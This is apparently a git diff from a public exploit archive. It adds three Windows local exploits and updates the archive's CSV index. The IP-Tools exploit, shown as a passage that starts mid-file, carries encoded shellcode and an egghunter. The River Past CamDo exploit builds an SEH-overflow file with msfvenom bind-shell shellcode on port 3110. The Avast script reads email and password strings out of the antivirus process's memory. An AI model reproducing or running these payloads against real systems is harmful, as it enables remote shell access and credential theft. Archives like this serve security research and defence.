"\x32\x4d\x33\x54\x77\x70\x6e\x69\x68\x63\x30\x57\x63" +egg += "\x67\x30\x57\x55\x61\x6b\x46\x71\x7a\x56\x72\x31\x49" +egg += "\x62\x76\x6d\x32\x79\x6d\x55\x36\x6a\x67\x62\x64\x51" +egg += "\x34\x67\x4c\x73\x31\x33\x31\x6e\x6d\x71\x54\x44\x64" +egg += "\x66\x70\x39\x56\x43\x30\x77\x34\x43\x64\x76\x30\x72" +egg += "\x76\x61\x46\x50\x56\x32\x66\x30\x56\x62\x6e\x72\x76" +egg += "\x53\x66\x61\x43\x52\x76\x62\x48\x44\x39\x78\x4c\x45" +egg += "\x6f\x4f\x76\x69\x6f\x68\x55\x6b\x39\x39\x70\x42\x6e" +egg += "\x66\x36\x50\x46\x69\x6f\x36\x50\x75\x38\x33\x38\x4b" +egg += "\x37\x67\x6d\x73\x50\x69\x6f\x6a\x75\x6d\x6b\x58\x70" +egg += "\x4d\x65\x79\x32\x76\x36\x75\x38\x4e\x46\x6f\x65\x6d" +egg += "\x6d\x6f\x6d\x69\x6f\x79\x45\x35\x6c\x73\x36\x31\x6c" +egg += "\x44\x4a\x6b\x30\x79\x6b\x4d\x30\x73\x45\x74\x45\x6f" +egg += "\x4b\x30\x47\x32\x33\x31\x62\x72\x4f\x52\x4a\x37\x70" +egg += "\x72\x73\x49\x6f\x7a\x75\x41\x41" + +f = open ("egg.txt", "w") +f.write(egg) +f.close() + +##################EGG Hunter Shellcode Generation################################# + +#encode egghunter code (looking for w00tw00t) (wow64 egghunter code produced by mona) into only alpha characters; egghunter shellcode proceeded by xor edx,edx (start egg hunting at 0x00000000) +#echo -ne "\x33\xd2\x31\xdb\x53\x53\x53\x53\xb3\xc0\x66\x81\xca\xff\x0f\x42\x52\x6a\x26\x58\x33\xc9\x8b\xd4\x64\xff\x13\x5e\x5a\x3c\x05\x74\xe9\xb8\x77\x30\x30\x74\x8b\xfa\xaf\x75\xe4\xaf\x75\xe1\xff\xe7" | msfvenom BufferRegister=EDI -e x86/alpha_mixed -f python -a x86 --platform windows -v egghunter -p - +#150 bytes + +egghunter = "" +egghunter += "\x57\x59\x49\x49\x49\x49\x49\x49\x49\x49\x49\x49" +egghunter += "\x49\x49\x49\x49\x49\x49\x37\x51\x5a\x6a\x41\x58" +egghunter += "\x50\x30\x41\x30\x41\x6b\x41\x41\x51\x32\x41\x42" +egghunter += "\x32\x42\x42\x30\x42\x42\x41\x42\x58\x50\x38\x41" +egghunter += "\x42\x75\x4a\x49\x35\x63\x4b\x62\x30\x31\x4b\x6b" +egghunter += "\x52\x73\x56\x33\x46\x33\x46\x33\x58\x33\x49\x50" +egghunter += "\x45\x36\x6f\x71\x6a\x6a\x6b\x4f\x46\x6f\x31\x52" +egghunter += "\x66\x32\x72\x4a\x55\x76\x32\x78\x70\x33\x38\x49" +egghunter += "\x6e\x6b\x5a\x74\x55\x34\x79\x6f\x37\x63\x53\x6e" +egghunter += "\x62\x7a\x55\x6c\x66\x65\x51\x64\x4d\x39\x48\x38" +egghunter += "\x30\x77\x50\x30\x70\x30\x74\x34\x4e\x6b\x58\x7a" +egghunter += "\x6c\x6f\x51\x65\x4a\x44\x4e\x4f\x42\x55\x79\x71" +egghunter += "\x69\x6f\x6a\x47\x41\x41" + +#0x00473259 : {pivot 64 / 0x40}[IP_TOOLS.EXE] + +eip = "\x59\x32\x47\x00" + +buffer = egghunter + "\x41" * (264 - len(egghunter)) + eip + +f = open ("egghunter.txt", "w") +f.write(buffer) +f.close() \ No newline at end of file diff --git a/exploits/windows/local/46335.py b/exploits/windows/local/46335.py new file mode 100755 index 000000000..c81b585ab --- /dev/null +++ b/exploits/windows/local/46335.py @@ -0,0 +1,67 @@ +# Exploit Title: River Past CamDo SEH Local Exploit +# Date: 07.02.2019 +# Vendor Homepage:www.riverpast.com +# Software Link: https://en.softonic.com/download/river-past-cam-do/windows/post-download?sl=1 +# Exploit Author: Achilles +# Tested Version: 3.7.6 +# Tested on: Windows XP SP3 EN + +# 1.- Run python code : CamDo.py +# 2.- Open EVIL.txt and copy content to clipboard +# 3.- Open CamDo.exe and click on the 'Options' Inside fhe 'File' Menu. +# 4.- Paste the Content of EVIL.txt into the 'Lame_enc.dll' name field. +# 5.- Click 'OK' and you will have a bind shell port 3110. + + +#!/usr/bin/env python +import struct + +buffer = "\x41" * 280 +NSEH = "\xeb\x06\x90\x90" #jmp short 6 +SEH = struct.pack('<L',0x10010b0b) #pop pop ret rvddshow2.dll +nops = "\x90" * 20 + +#badchar \x00\x0a\x0d\x2f\ +#msfvenom -p windows/shell_bind_tcp LPORT=3110 -a x86 -b '\x00\x0a\x0d\x2f' -f python + +shellcode = ("\xb8\x9c\x94\x39\x34\xdb\xda\xd9\x74\x24\xf4\x5a\x33" +"\xc9\xb1\x53\x31\x42\x12\x03\x42\x12\x83\x5e\x90\xdb" +"\xc1\xa2\x71\x99\x2a\x5a\x82\xfe\xa3\xbf\xb3\x3e\xd7" +"\xb4\xe4\x8e\x93\x98\x08\x64\xf1\x08\x9a\x08\xde\x3f" +"\x2b\xa6\x38\x0e\xac\x9b\x79\x11\x2e\xe6\xad\xf1\x0f" +"\x29\xa0\xf0\x48\x54\x49\xa0\x01\x12\xfc\x54\x25\x6e" +"\x3d\xdf\x75\x7e\x45\x3c\xcd\x81\x64\x93\x45\xd8\xa6" +"\x12\x89\x50\xef\x0c\xce\x5d\xb9\xa7\x24\x29\x38\x61" +"\x75\xd2\x97\x4c\xb9\x21\xe9\x89\x7e\xda\x9c\xe3\x7c" +"\x67\xa7\x30\xfe\xb3\x22\xa2\x58\x37\x94\x0e\x58\x94" +"\x43\xc5\x56\x51\x07\x81\x7a\x64\xc4\xba\x87\xed\xeb" +"\x6c\x0e\xb5\xcf\xa8\x4a\x6d\x71\xe9\x36\xc0\x8e\xe9" +"\x98\xbd\x2a\x62\x34\xa9\x46\x29\x51\x1e\x6b\xd1\xa1" +"\x08\xfc\xa2\x93\x97\x56\x2c\x98\x50\x71\xab\xdf\x4a" +"\xc5\x23\x1e\x75\x36\x6a\xe5\x21\x66\x04\xcc\x49\xed" +"\xd4\xf1\x9f\x98\xdc\x54\x70\xbf\x21\x26\x20\x7f\x89" +"\xcf\x2a\x70\xf6\xf0\x54\x5a\x9f\x99\xa8\x65\x93\x7f" +"\x24\x83\xc1\x6f\x60\x1b\x7d\x52\x57\x94\x1a\xad\xbd" +"\x8c\x8c\xe6\xd7\x0b\xb3\xf6\xfd\x3b\x23\x7d\x12\xf8" +"\x52\x82\x3f\xa8\x03\x15\xb5\x39\x66\x87\xca\x13\x10" +"\x24\x58\xf8\xe0\x23\x41\x57\xb7\x64\xb7\xae\x5d\x99" +"\xee\x18\x43\x60\x76\x62\xc7\xbf\x4b\x6d\xc6\x32\xf7" +"\x49\xd8\x8a\xf8\xd5\x8c\x42\xaf\x83\x7a\x25\x19\x62" +"\xd4\xff\xf6\x2c\xb0\x86\x34\xef\xc6\x86\x10\x99\x26" +"\x36\xcd\xdc\x59\xf7\x99\xe8\x22\xe5\x39\x16\xf9\xad" +"\x4a\x5d\xa3\x84\xc2\x38\x36\x95\x8e\xba\xed\xda\xb6" +"\x38\x07\xa3\x4c\x20\x62\xa6\x09\xe6\x9f\xda\x02\x83" +"\x9f\x49\x22\x86") + + +payload = buffer + NSEH + SEH + nops + shellcode + + +try: + f=open("Evil.txt","w") + print "[+] Creating %s bytes evil payload.." %len(payload) + f.write(payload) + f.close() + print "[+] File created!" +except: + print "File cannot be created" \ No newline at end of file diff --git a/exploits/windows/local/46345.py b/exploits/windows/local/46345.py new file mode 100755 index 000000000..d62e36bf7 --- /dev/null +++ b/exploits/windows/local/46345.py @@ -0,0 +1,49 @@ +# Exploit Title: Avast Anti-Virus Local Credentials Disclosure < 19.1.2360 +# Date: 01/18/2019 +# Exploit Author: Nathu Nandwani +# Website: http://nandtech.co/ +# Version: before 19.1.2360 (build 19.1.4142.0) +# Tested on: Windows 10 x64 +# CVE: CVE-2018-12572 +# Based on LiquidWorm's and Yakir Wizman's proof of concepts + +from winappdbg import Debug, Process + +debug = Debug() +processname = "AvastUI.exe" +pid = 0 +mem_contents = [] + +email = "" +password = "" + +try: + debug.system.scan_processes() + for (process, process_name) in debug.system.find_processes_by_filename(processname): + pid = process.get_pid() + if pid is not 0: + print ("AvastUI PID: " + str(pid)) + process = Process(pid) + for i in process.search_regexp('"password":"'): + mem_contents.append(process.read(i[0], 200)) + print "Dump: " + print process.read(i[0], 200) + for i in mem_contents: + password = i.split(",")[0] + for i in process.search_regexp('"email":"'): + mem_contents.append(process.read(i[0], 200)) + print "Dump: " + print process.read(i[0], 200) + for i in mem_contents: + email = i.split(",")[0] + if email != "" and password != "": + print "" + print "Found Credentials from Memory!" + print email + print password + else: + print "No credentials found!" + else: + print "Avast not running!" +finally: + debug.stop() \ No newline at end of file diff --git a/files_exploits.csv b/files_exploits.csv index bd1319547..6e00f8f7b 100644 --- a/files_exploits.csv +++ b/files_exploits.csv @@ -2038,7 +2038,7 @@ id,file,description,date,author,type,platform,port 17842,exploits/windows/dos/17842.txt,"progea movicon / powerhmi 11.2.1085 - Multiple Vulnerabilities",2011-09-14,"Luigi Auriemma",dos,windows, 17843,exploits/windows/dos/17843.txt,"Rockwell RSLogix 19 - Denial of Service",2011-09-14,"Luigi Auriemma",dos,windows, 17844,exploits/windows/dos/17844.txt,"Measuresoft ScadaPro 4.0.0 - Multiple Vulnerabilities",2011-09-14,"Luigi Auriemma",dos,windows, -17856,exploits/windows/dos/17856.py,"KnFTP 1.0.0 Server - Multiple Buffer Overflows (Denial of Service) (SEH) (PoC)",2011-09-18,loneferret,dos,windows,21 +17856,exploits/windows/dos/17856.py,"KnFTP 1.0.0 Server - Multiple Buffer Overflows (PoC) (SEH)",2011-09-18,loneferret,dos,windows,21 17878,exploits/windows/dos/17878.txt,"EViews 7.0.0.1 (aka 7.2) - Multiple Vulnerabilities",2011-09-21,"Luigi Auriemma",dos,windows, 17879,exploits/windows/dos/17879.txt,"MetaServer RT 3.2.1.450 - Multiple Vulnerabilities",2011-09-21,"Luigi Auriemma",dos,windows, 17885,exploits/windows/dos/17885.txt,"sunway ForceControl 6.1 sp3 - Multiple Vulnerabilities",2011-09-23,"Luigi Auriemma",dos,windows, @@ -4151,7 +4151,7 @@ id,file,description,date,author,type,platform,port 32860,exploits/java/dos/32860.txt,"Sun Java System Calendar Server 6.3 - Duplicate URI Request Denial of Service",2009-03-31,"SCS team",dos,java, 32865,exploits/multiple/dos/32865.py,"WhatsApp < 2.11.7 - Remote Crash",2014-04-14,"Jaime Sánchez",dos,multiple, 32881,exploits/windows/dos/32881.py,"QtWeb Browser 2.0 - '.HTML' File Remote Denial of Service",2009-04-01,LiquidWorm,dos,windows, -32899,exploits/windows/dos/32899.py,"Jzip - Buffer Overflow (Denial of Service) (SEH Unicode)",2014-04-16,"motaz reda",dos,windows, +32899,exploits/windows/dos/32899.py,"Jzip - Buffer Overflow (PoC) (SEH Unicode)",2014-04-16,"motaz reda",dos,windows, 32902,exploits/windows/dos/32902.py,"Microsoft Internet Explorer 8 - File Download Denial of Service",2009-04-11,"Nam Nguyen",dos,windows, 32926,exploits/linux/dos/32926.c,"Linux Kernel - 'group_info' refcounter Overflow Memory Corruption",2014-04-18,"Thomas Pollet",dos,linux, 32939,exploits/windows/dos/32939.txt,"Trend Micro OfficeScan 8.0 Client - Denial of Service",2009-04-21,"Juan Pablo Lopez Yacubian",dos,windows, @@ -4442,8 +4442,8 @@ id,file,description,date,author,type,platform,port 35489,exploits/multiple/dos/35489.pl,"Perl 5.x - 'Perl_reg_numbered_buff_fetch()' Remote Denial of Service",2011-03-23,"Vladimir Perepelitsa",dos,multiple, 35502,exploits/windows/dos/35502.pl,"eXPert PDF Batch Creator 7.0.880.0 - Denial of Service",2011-03-27,KedAns-Dz,dos,windows, 35507,exploits/windows/dos/35507.pl,"DivX Player 7 - Multiple Remote Buffer Overflow Vulnerabilities",2011-03-27,KedAns-Dz,dos,windows, -35530,exploits/windows/dos/35530.py,"Mediacoder 0.8.33 build 5680 - '.m3u' Buffer Overflow (Denial of Service) (SEH) (PoC)",2014-12-15,s-dz,dos,windows, -35531,exploits/windows/dos/35531.py,"Mediacoder 0.8.33 build 5680 - '.lst' Buffer Overflow (Denial of Service) (SEH) (PoC)",2014-12-15,s-dz,dos,windows, +35530,exploits/windows/dos/35530.py,"Mediacoder 0.8.33 build 5680 - '.m3u' Buffer Overflow (PoC) (SEH Overwrite)",2014-12-15,s-dz,dos,windows, +35531,exploits/windows/dos/35531.py,"Mediacoder 0.8.33 build 5680 - '.lst' Buffer Overflow (PoC) (SEH Overwrite)",2014-12-15,s-dz,dos,windows, 35532,exploits/windows/dos/35532.py,"jaangle 0.98i.977 - Denial of Service",2014-12-15,s-dz,dos,windows, 35539,exploits/php/dos/35539.txt,"phpMyAdmin 4.0.x/4.1.x/4.2.x - Denial of Service",2014-12-15,"Javer Nieto & Andres Rojas",dos,php, 35552,exploits/windows/dos/35552.py,"MoviePlay 4.82 - '.avi' Buffer Overflow",2011-03-31,^Xecuti0N3r,dos,windows, @@ -5025,7 +5025,7 @@ id,file,description,date,author,type,platform,port 39466,exploits/multiple/dos/39466.txt,"Adobe Flash - H264 File Stack Corruption",2016-02-17,"Google Security Research",dos,multiple, 39467,exploits/multiple/dos/39467.txt,"Adobe Flash - BitmapData.drawWithQuality Heap Overflow",2016-02-17,"Google Security Research",dos,multiple, 39470,exploits/windows/dos/39470.py,"XM Easy Personal FTP Server 5.8.0 - 'HELP' Remote Denial of Service",2016-02-19,"Pawan Lal",dos,windows, -39471,exploits/windows/dos/39471.txt,"STIMS Buffer 1.1.20 - Buffer Overflow (Denial of Service) (SEH) (PoC)",2016-02-19,"Shantanu Khandelwal",dos,windows, +39471,exploits/windows/dos/39471.txt,"STIMS Buffer 1.1.20 - Buffer Overflow (PoC) (SEH Overwrite)",2016-02-19,"Shantanu Khandelwal",dos,windows, 39472,exploits/windows/dos/39472.txt,"STIMS Cutter 1.1.3.20 - Buffer Overflow (Denial of Service) (PoC)",2016-02-19,"Shantanu Khandelwal",dos,windows, 39475,exploits/windows/dos/39475.py,"QuickHeal 16.00 - 'webssx.sys' Driver Denial of Service",2016-02-19,"Fitzl Csaba",dos,windows, 39476,exploits/multiple/dos/39476.txt,"Adobe Flash - SimpleButton Creation Type Confusion",2016-02-19,"Google Security Research",dos,multiple, @@ -5064,7 +5064,7 @@ id,file,description,date,author,type,platform,port 39551,exploits/multiple/dos/39551.txt,"Putty pscp 0.66 - Stack Buffer Overwrite",2016-03-10,tintinweb,dos,multiple, 39555,exploits/linux/dos/39555.txt,"Linux Kernel 3.10.0-229.x (CentOS / RHEL 7.1) - 'snd-usb-audio' Crash (PoC)",2016-03-14,"OpenSource Security",dos,linux, 39556,exploits/linux/dos/39556.txt,"Linux Kernel 3.10.0-229.x (CentOS / RHEL 7.1) - 'iowarrior' Driver Crash (PoC)",2016-03-14,"OpenSource Security",dos,linux, -39557,exploits/windows/dos/39557.py,"Zortam Mp3 Media Studio 20.15 - Overflow (SEH) (Denial of Service)",2016-03-14,INSECT.B,dos,windows, +39557,exploits/windows/dos/39557.py,"Zortam Mp3 Media Studio 20.15 - Overflow (PoC) (SEH)",2016-03-14,INSECT.B,dos,windows, 39560,exploits/windows/dos/39560.txt,"Microsoft Windows Kernel - 'ATMFD.dll' OTF Font Processing Pool-Based Buffer Overflow (MS16-026)",2016-03-14,"Google Security Research",dos,windows, 39561,exploits/windows/dos/39561.txt,"Microsoft Windows Kernel - 'ATMFD.dll' OTF Font Processing Stack Corruption (MS16-026)",2016-03-14,"Google Security Research",dos,windows, 39562,exploits/windows/dos/39562.html,"Microsoft Internet Explorer - Read AV in MSHTML!Layout::LayoutBuilderDivider::BuildPageLayout (MS16-023)",2016-03-14,"Google Security Research",dos,windows, @@ -6228,6 +6228,7 @@ id,file,description,date,author,type,platform,port 46030,exploits/windows/dos/46030.py,"SQLScan 1.0 - Denial of Service (PoC)",2018-12-21,"Rafael Pedrero",dos,windows, 46038,exploits/linux/dos/46038.py,"Angry IP Scanner for Linux 3.5.3 - Denial of Service (PoC)",2018-12-24,Sam,dos,linux, 46042,exploits/multiple/dos/46042.html,"Google Chrome 70 - SQLite Magellan Crash (PoC)",2018-12-15,zhuowei,dos,multiple, +46048,exploits/multiple/dos/46048.py,"Netatalk 3.1.12 - Authentication Bypass (PoC)",2018-12-21,"Tenable NS",dos,multiple, 46057,exploits/windows_x86/dos/46057.py,"Product Key Explorer 4.0.9 - Denial of Service (PoC)",2018-12-27,T3jv1l,dos,windows_x86, 46062,exploits/windows_x86/dos/46062.py,"NetShareWatcher 1.5.8 - Denial of Service (PoC)",2018-12-27,T3jv1l,dos,windows_x86, 46063,exploits/windows_x86/dos/46063.py,"ShareAlarmPro 2.1.4 - Denial of Service (PoC)",2018-12-27,T3jv1l,dos,windows_x86, @@ -6278,20 +6279,20 @@ id,file,description,date,author,type,platform,port 46278,exploits/linux/dos/46278.py,"MiniUPnPd 2.1 - Out-of-Bounds Read",2019-01-29,b1ack0wl,dos,linux, 46284,exploits/windows/dos/46284.py,"Advanced File Manager 3.4.1 - Denial of Service (PoC)",2019-01-30,"Rafael Pedrero",dos,windows, 46285,exploits/multiple/dos/46285.c,"iOS/macOS 10.13.6 - 'if_ports_used_update_wakeuuid()' 16-byte Uninitialized Kernel Stack Disclosure",2019-01-30,"Google Security Research",dos,multiple, -46286,exploits/windows/dos/46286.py,"IP-Tools 2.50 - Denial of Service SEH Overwrite (PoC)",2019-01-30,"Rafael Pedrero",dos,windows, -46287,exploits/windows/dos/46287.py,"Necrosoft DIG 0.4 - Denial of Service SEH Overwrite (PoC)",2019-01-30,"Rafael Pedrero",dos,windows, +46286,exploits/windows/dos/46286.py,"IP-Tools 2.50 - Local Buffer Overflow (PoC)",2019-01-30,"Rafael Pedrero",dos,windows, +46287,exploits/windows/dos/46287.py,"Necrosoft DIG 0.4 - Buffer Overflow (PoC) (SEH Overwrite)",2019-01-30,"Rafael Pedrero",dos,windows, 46289,exploits/windows/dos/46289.py,"Anyburn 4.3 - 'Convert image to file format' Denial of Service",2019-01-31,"Dino Covotsos",dos,windows, 46291,exploits/windows/dos/46291.py,"Advanced Host Monitor 11.90 Beta - 'Registration number' Denial of Service (PoC)",2019-01-31,"Luis Martínez",dos,windows, 46292,exploits/windows/dos/46292.py,"AMAC Address Change 5.4 - Denial of Service (PoC)",2019-01-31,"Rafael Pedrero",dos,windows, 46293,exploits/windows/dos/46293.py,"ASPRunner Professional 6.0.766 - Denial of Service (PoC)",2019-01-31,"Rafael Pedrero",dos,windows, -46294,exploits/windows/dos/46294.py,"FlexHEX 2.46 - Denial of Service SEH Overwrite (PoC)",2019-01-31,"Rafael Pedrero",dos,windows, +46294,exploits/windows/dos/46294.py,"FlexHEX 2.46 - Buffer Overflow (PoC) (SEH Overwrite)",2019-01-31,"Rafael Pedrero",dos,windows, 46295,exploits/windows/dos/46295.py,"LanHelper 1.74 - Denial of Service (PoC)",2019-01-31,"Rafael Pedrero",dos,windows, 46296,exploits/macos/dos/46296.c,"macOS XNU - Copy-on-Write Behaviour Bypass via Partial-Page Truncation of File",2019-01-31,"Google Security Research",dos,macos, 46297,exploits/multiple/dos/46297.c,"macOS < 10.14.3 / iOS < 12.1.3 - Arbitrary mach Port Name Deallocation in XPC Services due to Invalid mach Message Parsing in _xpc_serializer_unpack",2019-01-31,"Google Security Research",dos,multiple, 46298,exploits/multiple/dos/46298.c,"macOS < 10.14.3 / iOS < 12.1.3 - Sandbox Escapes due to Type Confusions and Memory Safety Issues in iohideventsystem",2019-01-31,"Google Security Research",dos,multiple, 46299,exploits/multiple/dos/46299.c,"macOS < 10.14.3 / iOS < 12.1.3 XNU - 'vm_map_copy' Optimization which Requires Atomicity isn't Atomic",2019-01-31,"Google Security Research",dos,multiple, 46300,exploits/multiple/dos/46300.c,"macOS < 10.14.3 / iOS < 12.1.3 - Kernel Heap Overflow in PF_KEY due to Lack of Bounds Checking when Retrieving Statistics",2019-01-31,"Google Security Research",dos,multiple, -46304,exploits/windows/dos/46304.py,"Remote Process Explorer 1.0.0.16 - Denial of Service SEH Overwrite (PoC)",2019-02-01,"Rafael Pedrero",dos,windows, +46304,exploits/windows/dos/46304.py,"Remote Process Explorer 1.0.0.16 - Buffer Overflow (PoC) (SEH Overwrite)",2019-02-01,"Rafael Pedrero",dos,windows, 46309,exploits/windows/dos/46309.py,"MyVideoConverter Pro 3.14 - Denial of Service",2019-02-04,Achilles,dos,windows, 46312,exploits/windows/dos/46312.py,"River Past Ringtone Converter 2.7.6.1601 - Denial of Service (PoC)",2019-02-04,"Rafael Pedrero",dos,windows, 46313,exploits/windows/dos/46313.py,"SpotAuditor 3.6.7 - Denial of Service (PoC)",2019-02-04,"Rafael Pedrero",dos,windows, @@ -6299,6 +6300,10 @@ id,file,description,date,author,type,platform,port 46321,exploits/windows/dos/46321.py,"Device Monitoring Studio 8.10.00.8925 - Denial of Service (PoC)",2019-02-05,"Victor Mondragón",dos,windows, 46322,exploits/windows/dos/46322.py,"River Past Audio Converter 7.7.16 - Denial of Service (PoC)",2019-02-05,Achilles,dos,windows, 46332,exploits/multiple/dos/46332.txt,"Skia - Incorrect Convexity Assumptions Leading to Buffer Overflows",2019-02-06,"Google Security Research",dos,multiple, +46337,exploits/android/dos/46337.sh,"AirDroid 4.2.1.6 - Denial of Service",2019-02-11,s4vitar,dos,android, +46338,exploits/windows/dos/46338.py,"FutureDj Pro 1.7.2.0 - Denial of Service",2019-02-11,Achilles,dos,windows, +46343,exploits/windows/dos/46343.py,"NordVPN 6.19.6 - Denial of Service (PoC)",2019-02-11,"Alejandra Sánchez",dos,windows, +46346,exploits/windows/dos/46346.py,"River Past Video Cleaner 7.6.3 - Local Buffer Overflow (SEH)",2019-02-11,crash_manucoot,dos,windows, 3,exploits/linux/local/3.c,"Linux Kernel 2.2.x/2.4.x (RedHat) - 'ptrace/kmod' Local Privilege Escalation",2003-03-30,"Wojciech Purczynski",local,linux, 4,exploits/solaris/local/4.c,"Sun SUNWlldap Library Hostname - Local Buffer Overflow",2003-04-01,Andi,local,solaris, 12,exploits/linux/local/12.c,"Linux Kernel < 2.4.20 - Module Loader Privilege Escalation",2003-04-14,KuRaK,local,linux, @@ -10281,6 +10286,10 @@ id,file,description,date,author,type,platform,port 46290,exploits/windows/local/46290.py,"UltraISO 9.7.1.3519 - 'Output FileName' Local Buffer Overflow (SEH)",2019-01-31,"Dino Covotsos",local,windows, 46301,exploits/windows/local/46301.py,"PassFab Excel Password Recovery 8.3.1 - SEH Local Exploit",2019-02-01,Achilles,local,windows, 46331,exploits/windows/local/46331.py,"River Past Audio Converter 7.7.16 - Buffer Overflow (SEH)",2019-02-06,"Matteo Malvica",local,windows, +46334,exploits/windows/local/46334.py,"IP-Tools 2.5 - Local Buffer Overflow (SEH) (Egghunter)",2019-02-11,"Juan Prescotto",local,windows, +46335,exploits/windows/local/46335.py,"River Past Cam Do 3.7.6 - Local Buffer Overflow (SEH)",2019-02-11,Achilles,local,windows, +46341,exploits/linux/local/46341.rb,"Evince - CBT File Command Injection (Metasploit)",2019-02-11,Metasploit,local,linux, +46345,exploits/windows/local/46345.py,"Avast Anti-Virus < 19.1.2360 - Local Credentials Disclosure",2019-02-11,"Nathu Nandwani",local,windows, 1,exploits/windows/remote/1.c,"Microsoft IIS - WebDAV 'ntdll.dll' Remote Overflow",2003-03-23,kralor,remote,windows,80 2,exploits/windows/remote/2.c,"Microsoft IIS 5.0 - WebDAV Remote",2003-03-24,RoMaNSoFt,remote,windows,80 5,exploits/windows/remote/5.c,"Microsoft Windows 2000/NT 4 - RPC Locator Service Remote Overflow",2003-04-03,"Marcin Wolak",remote,windows,139 @@ -17142,7 +17151,6 @@ id,file,description,date,author,type,platform,port 45999,exploits/windows/remote/45999.txt,"MiniShare 1.4.1 - 'HEAD/POST' Remote Buffer Overflow",2018-12-18,"Rafael Pedrero",remote,windows,80 46024,exploits/multiple/remote/46024.rb,"Erlang - Port Mapper Daemon Cookie RCE (Metasploit)",2018-12-20,Metasploit,remote,multiple,25672 46034,exploits/multiple/remote/46034.py,"Netatalk < 3.1.12 - Authentication Bypass",2018-12-21,"Jacob Baines",remote,multiple, -46048,exploits/multiple/remote/46048.py,"Netatalk - Bypass Authentication",2018-12-21,"Tenable NS",remote,multiple, 46052,exploits/multiple/remote/46052.py,"Kubernetes - (Unauthenticated) Arbitrary Requests",2018-12-10,evict,remote,multiple, 46053,exploits/multiple/remote/46053.py,"Kubernetes - (Authenticated) Arbitrary Requests",2018-12-10,evict,remote,multiple, 46073,exploits/linux/remote/46073.rb,"Hashicorp Consul - Remote Command Execution via Rexec (Metasploit)",2019-01-02,Metasploit,remote,linux, @@ -17157,6 +17165,9 @@ id,file,description,date,author,type,platform,port 46242,exploits/linux/remote/46242.txt,"Ghostscript 9.26 - Pseudo-Operator Remote Code Execution",2019-01-24,"Google Security Research",remote,linux, 46250,exploits/windows_x86-64/remote/46250.py,"CloudMe Sync 1.11.2 Buffer Overflow - WoW64 (DEP Bypass)",2019-01-28,"Matteo Malvica",remote,windows_x86-64, 46307,exploits/linux/remote/46307.py,"LibSSH 0.7.6 / 0.8.4 - Unauthorized Access",2018-10-20,jas502n,remote,linux, +46339,exploits/osx/remote/46339.rb,"Adobe Flash Player - DeleteRangeTimelineOperation Type Confusion (Metasploit)",2019-02-11,Metasploit,remote,osx, +46340,exploits/php/remote/46340.rb,"NUUO NVRmini - upgrade_handle.php Remote Command Execution (Metasploit)",2019-02-11,Metasploit,remote,php,80 +46342,exploits/multiple/remote/46342.py,"Indusoft Web Studio 8.1 SP2 - Remote Code Execution",2019-02-11,"Jacob Baines",remote,multiple, 6,exploits/php/webapps/6.php,"WordPress 2.0.2 - 'cache' Remote Shell Injection",2006-05-25,rgod,webapps,php, 44,exploits/php/webapps/44.pl,"phpBB 2.0.5 - SQL Injection Password Disclosure",2003-06-20,"Rick Patel",webapps,php, 47,exploits/php/webapps/47.c,"phpBB 2.0.4 - PHP Remote File Inclusion",2003-06-30,Spoofed,webapps,php, @@ -40799,3 +40810,10 @@ id,file,description,date,author,type,platform,port 46328,exploits/php/webapps/46328.txt,"osCommerce 2.3.4.1 - 'currency' SQL Injection",2019-02-06,"Mehmet EMIROGLU",webapps,php,80 46329,exploits/php/webapps/46329.txt,"osCommerce 2.3.4.1 - 'products_id' SQL Injection",2019-02-06,"Mehmet EMIROGLU",webapps,php,80 46330,exploits/php/webapps/46330.txt,"osCommerce 2.3.4.1 - 'reviews_id' SQL Injection",2019-02-06,"Mehmet EMIROGLU",webapps,php,80 +46333,exploits/cgi/webapps/46333.txt,"Smoothwall Express 3.1-SP4 - Cross-Site Scripting",2019-02-11,"Ozer Goker",webapps,cgi, +46336,exploits/hardware/webapps/46336.html,"Coship Wireless Router 4.0.0.x/5.0.0.x - WiFi Password Reset",2019-02-11,"Adithyan AK",webapps,hardware, +46344,exploits/cgi/webapps/46344.txt,"IPFire 2.21 - Cross-Site Scripting",2019-02-11,"Ozer Goker",webapps,cgi, +46347,exploits/php/webapps/46347.txt,"MyBB Bans List 1.0 - Cross-Site Scripting",2019-02-11,0xB9,webapps,php, +46348,exploits/php/webapps/46348.py,"VA MAX 8.3.4 - Authenticated Remote Code Execution",2019-02-11,"Cody Sixteen",webapps,php, +46349,exploits/linux/webapps/46349.txt,"CentOS Web Panel 0.9.8.763 - Persistent Cross-Site Scripting",2019-02-11,DKM,webapps,linux, +46350,exploits/php/webapps/46350.txt,"Webiness Inventory 2.3 - 'email' SQL Injection",2019-02-11,"Mehmet EMIROGLU",webapps,php,